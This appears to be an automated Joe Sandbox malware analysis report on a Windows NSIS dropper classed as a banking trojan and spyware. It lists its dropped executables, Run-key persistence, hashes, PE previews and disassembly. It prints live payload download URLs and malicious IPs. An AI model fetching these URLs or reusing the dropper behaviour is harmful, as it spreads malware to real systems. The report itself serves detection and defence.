                                                                                    http://192.168.2.1/b6v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.fz0575.com:2011/1.exeNoPserver.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://192.168.2.1:80/4v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.fz0575.com:2011/1.exepojserver.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            120.48.34.233
                                                                                            unknownChina
                                                                                            4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                                                                                            8.7.198.46
                                                                                            chinagov.8800.orgUnited States
                                                                                            14567SPRINGSUStrue
                                                                                            46.82.174.69
                                                                                            unknownGermany
                                                                                            3320DTAGInternetserviceprovideroperationsDEtrue
                                                                                            IP
                                                                                            192.168.2.1
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1579781
                                                                                            Start date and time:2024-12-23 09:00:36 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 10m 29s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:81
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:G3izWAY3Fa.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:118F7F61B6AFB1DA5E94EA1740222C73.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 83.3%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 99%
                                                                                            • Number of executed functions: 166
                                                                                            • Number of non-executed functions: 224
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            TimeTypeDescription
                                                                                            03:01:25API Interceptor1284x Sleep call for process: server.exe modified
                                                                                            03:01:27API Interceptor326x Sleep call for process: v5.exe modified
                                                                                            03:01:31API Interceptor1615x Sleep call for process: svchost.exe modified
                                                                                            03:01:51API Interceptor1x Sleep call for process: .exe modified
                                                                                            08:01:29AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC C:\Windows\XXXXXX05CA35CC\svchsot.exe
                                                                                            08:01:38AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw== C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                                                                                            No context
                                                                                            No context
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            SPRINGSUSnshppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 166.126.15.148
                                                                                            nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                            • 113.29.21.198
                                                                                            la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 192.30.164.221
                                                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 128.198.240.171
                                                                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                            • 166.126.117.121
                                                                                            jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                            • 166.126.15.112
                                                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 166.126.15.153
                                                                                            8DKuAcmAMT.elfGet hashmaliciousUnknownBrowse
                                                                                            • 166.126.240.187
                                                                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                            • 166.126.134.153
                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                            • 166.126.15.153
                                                                                            DTAGInternetserviceprovideroperationsDEarmv6l.elfGet hashmaliciousUnknownBrowse
                                                                                            • 79.193.89.169
                                                                                            armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                            • 93.218.244.191
                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                            • 79.214.151.97
                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 37.94.30.242
                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 79.206.150.140
                                                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 93.202.104.37
                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                            • 91.60.133.243
                                                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 37.86.102.231
                                                                                            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 217.234.140.150
                                                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 84.188.60.136
                                                                                            CHINANET-BACKBONENo31Jin-rongStreetCNarmv6l.elfGet hashmaliciousUnknownBrowse
                                                                                            • 61.146.165.65
                                                                                            armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                            • 14.118.130.115
                                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                                            • 59.175.154.153
                                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                                            • 36.45.84.63
                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                            • 123.163.227.84
                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                            • 111.226.186.147
                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 27.146.124.78
                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 111.182.110.21
                                                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 119.120.60.137
                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                            • 218.70.92.243
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Windows\Temp\server.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.590445953703057
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRg:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQY
                                                                                            MD5:00C090DAE3EE360E575655FE89121D83
                                                                                            SHA1:7E12E9268476B23B78E2953353DF38823DB0BD17
                                                                                            SHA-256:BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
                                                                                            SHA-512:9447F0F55AB28C6C184E721648DD525E500749A869756C5CE1F49CADE82AF984AB0AF9FBDB215F45E2BC4DC66E2ADD023FB36048C883814CF2FAD7D7EBF54154
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\Temp\server.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.5898551091068285
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
                                                                                            MD5:8A953A49796B7F8C7539A6B2BC175397
                                                                                            SHA1:5E4B317DD08B080EDCF127FF6E5F86F0108372BE
                                                                                            SHA-256:ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
                                                                                            SHA-512:5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\033726\svchost.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.5904450128761045
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRq:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQy
                                                                                            MD5:B573CCA4145727C22E1AD6774DBF3705
                                                                                            SHA1:E03C46743B3F3FAE25CF03429782B27C97AAA8F2
                                                                                            SHA-256:C76750E8A32C78D3883EF1B16666672E06CC44F2A2BAB783B8D4501AD5EF8CF2
                                                                                            SHA-512:BA94B9DE1811D57782F8CB0CF3E346AE41BC5E1152BF88C47EC4D42E6E0257271B00C9539807C4D7C1693152DD167D3C80E9BBD89AA012B4EB3A593DF7C56867
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\033726\svchost.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.590445953703057
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRg:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQY
                                                                                            MD5:00C090DAE3EE360E575655FE89121D83
                                                                                            SHA1:7E12E9268476B23B78E2953353DF38823DB0BD17
                                                                                            SHA-256:BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
                                                                                            SHA-512:9447F0F55AB28C6C184E721648DD525E500749A869756C5CE1F49CADE82AF984AB0AF9FBDB215F45E2BC4DC66E2ADD023FB36048C883814CF2FAD7D7EBF54154
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\Temp\server.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):7
                                                                                            Entropy (8bit):2.8073549220576046
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:qR:qR
                                                                                            MD5:7A1920D61156ABC05A60135AEFE8BC67
                                                                                            SHA1:808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E
                                                                                            SHA-256:21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
                                                                                            SHA-512:94ABFC7B11F4311E8E279B580907FEFC1118690479FB7E13F0C22ADE816BC2B63346498833B0241EEC2B09E15172E13027DC85024BACB7BC40C150F4131F7292
                                                                                            Malicious:false
                                                                                            Preview:Default
                                                                                            Process:C:\Users\user\Desktop\G3izWAY3Fa.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1429612
                                                                                            Entropy (8bit):6.009627235349156
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:GvbBARGCfE5TVUUCql3jpomr6RTmBfOKpf37Q+zAV9/NaCWxI7IPBRiAY:WARGEvqlzpomr6RTmBfOKpf37Q+zAV92
                                                                                            MD5:CCEE0912E79D434F0D2C1E11274F23C0
                                                                                            SHA1:9A34CD426601ACE88DCB91B3820DC98EBE29ED96
                                                                                            SHA-256:679B9AF0DEF4DBBE2E179AC05F9A7AB4C2FFC28A71964A9E9EDF2986BDC1B1A2
                                                                                            SHA-512:B87212CC683F2DF362E11F1B509D29B482A9560E04E562E580BD58755F6FE25C0BBF4CB525E793F205656F16AD32C7B909FC53E9C137E8A5F4415BAA5FF0977E
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.._.._.@W..._.9|.._..|.._..W..._.@W..._.._..]..S.._..S..a_..S..H_./T..._..S..._.Rich._.................PE..L......H.................@...................P....@.............................................................................@........B..........................PV..............................`...H............P..L.......@....................text...~>.......@.................. ..`.rdata.......P.......P..............@..@.data...t\...P...0...P..............@....rsrc....B.......P..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\G3izWAY3Fa.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.5898551091068285
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
                                                                                            MD5:8A953A49796B7F8C7539A6B2BC175397
                                                                                            SHA1:5E4B317DD08B080EDCF127FF6E5F86F0108372BE
                                                                                            SHA-256:ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
                                                                                            SHA-512:5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\G3izWAY3Fa.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                            Category:dropped
                                                                                            Size (bytes):16896
                                                                                            Entropy (8bit):7.562483931351241
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:PWxP8NYOCgS7+h4vIpWEXSPTNy2ineaLM1ies89sxLrG:uaiOCz6n4EXS7rirVer9sNr
                                                                                            MD5:48A02F4A003E8CBE683CF5DADA237168
                                                                                            SHA1:2A81C0962ADEEF89CE33DE746ADFD455C652D216
                                                                                            SHA-256:11933D11631C99743C3F457B30D5EBB72399BF52D53B51E9CD21E17B1CA1DFB0
                                                                                            SHA-512:A372B54806840A1D6DDAAFDCB7D5D1218A086DED2FE51C70C89034BA6CB9D644AC914AF998A4E4F614E0C990A864059A8618B1EDD28D39CC96C6FC74D9631F12
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1...b...b...b...b...b>..b...b...b...b...b...b~.b...b...b...bU..b...bz..b...bRich...b........................PE..L....>nU.................@........................@.................................................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                            Process:C:\Windows\Temp\server.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.5898551091068285
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
                                                                                            MD5:8A953A49796B7F8C7539A6B2BC175397
                                                                                            SHA1:5E4B317DD08B080EDCF127FF6E5F86F0108372BE
                                                                                            SHA-256:ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
                                                                                            SHA-512:5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\033726\svchost.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):7.590445953703057
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRg:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQY
                                                                                            MD5:00C090DAE3EE360E575655FE89121D83
                                                                                            SHA1:7E12E9268476B23B78E2953353DF38823DB0BD17
                                                                                            SHA-256:BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
                                                                                            SHA-512:9447F0F55AB28C6C184E721648DD525E500749A869756C5CE1F49CADE82AF984AB0AF9FBDB215F45E2BC4DC66E2ADD023FB36048C883814CF2FAD7D7EBF54154
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):24
                                                                                            Entropy (8bit):4.188721875540868
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:oCfe49:oCfD
                                                                                            MD5:6B2C41D2A2AF44EFB642F9C3DBCA6668
                                                                                            SHA1:5D98044E6220AD035474C209EF75CB8F37C6965C
                                                                                            SHA-256:623F011819A1BD73F84EE6593735C89462E596A4AD0B730B0F650A486D63E4C8
                                                                                            SHA-512:8C419F40477E11A315F30F79F61EFC17178B2C851276F4FD35175032073296787610DB29DA9C99A8B97551F22B01625A2F19CAFF6CD25B6F5E691AD56C3822E9
                                                                                            Malicious:false
                                                                                            Preview:C:\Windows\temp\v5.exe..
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):6.913255582101916
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:G3izWAY3Fa.exe
                                                                                            File size:963'286 bytes
                                                                                            MD5:118f7f61b6afb1da5e94ea1740222c73
                                                                                            SHA1:5a0d66ec18cdb3812bad259999cf64d051cefa8b
                                                                                            SHA256:aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
                                                                                            SHA512:a98dc6940d0a3026075b77d406f5481a0071c1c6465027f3da13716932e0fd6bd06c73a48aa068ba2206210b7f9ab057232323c548f090d71baa5d4ba128e791
                                                                                            SSDEEP:12288:YIrxBdnioD+GL4DY6TMMQ77iOF8X8WBBXnBZwECeLqq3RCmK9JI25q5iedndTIQe:PBRiEUDpZQ1abzwEJLfRWzIiednd518
                                                                                            TLSH:F425F04E65955B82C8F40D34837AB22E41246D1B49F4A7F5B4A9FF0EF93CC89CD36A21
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........
                                                                                            Icon Hash:2e6343696c6b572e
                                                                                            Entrypoint:0x4030cb
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:7fa974366048f9c551ef45714595665e
                                                                                            Instruction
                                                                                            sub esp, 00000180h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            xor ebx, ebx
                                                                                            push edi
                                                                                            mov dword ptr [esp+18h], ebx
                                                                                            mov dword ptr [esp+10h], 00409160h
                                                                                            xor esi, esi
                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                            call dword ptr [00407030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004070B0h]
                                                                                            push ebx
                                                                                            call dword ptr [0040727Ch]
                                                                                            push 00000008h
                                                                                            mov dword ptr [00423F38h], eax
                                                                                            call 00007F2080B44A16h
                                                                                            mov dword ptr [00423E84h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+34h]
                                                                                            push 00000160h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 0041F430h
                                                                                            call dword ptr [00407158h]
                                                                                            push 00409154h
                                                                                            push 00423680h
                                                                                            call 00007F2080B446C9h
                                                                                            call dword ptr [004070ACh]
                                                                                            mov edi, 00429000h
                                                                                            push eax
                                                                                            push edi
                                                                                            call 00007F2080B446B7h
                                                                                            push ebx
                                                                                            call dword ptr [0040710Ch]
                                                                                            cmp byte ptr [00429000h], 00000022h
                                                                                            mov dword ptr [00423E80h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007F2080B41E2Ch
                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                            mov eax, 00429001h
                                                                                            push dword ptr [esp+14h]
                                                                                            push eax
                                                                                            call 00007F2080B441AAh
                                                                                            push eax
                                                                                            call dword ptr [0040721Ch]
                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                            jmp 00007F2080B41E85h
                                                                                            cmp cl, 00000020h
                                                                                            jne 00007F2080B41E28h
                                                                                            inc eax
                                                                                            cmp byte ptr [eax], 00000020h
                                                                                            je 00007F2080B41E1Ch
                                                                                            cmp byte ptr [eax], 00000022h
                                                                                            mov byte ptr [eax+eax+00h], 00000000h
                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x57180.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x58d20x5a00c69726ed422d3dcfdec9731986daa752False0.665234375data6.4331003482809646IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x70000x11900x1200a2c7710fa66fcbb43c7ef0ab9eea5e9aFalse0.4453125data5.179763757809345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
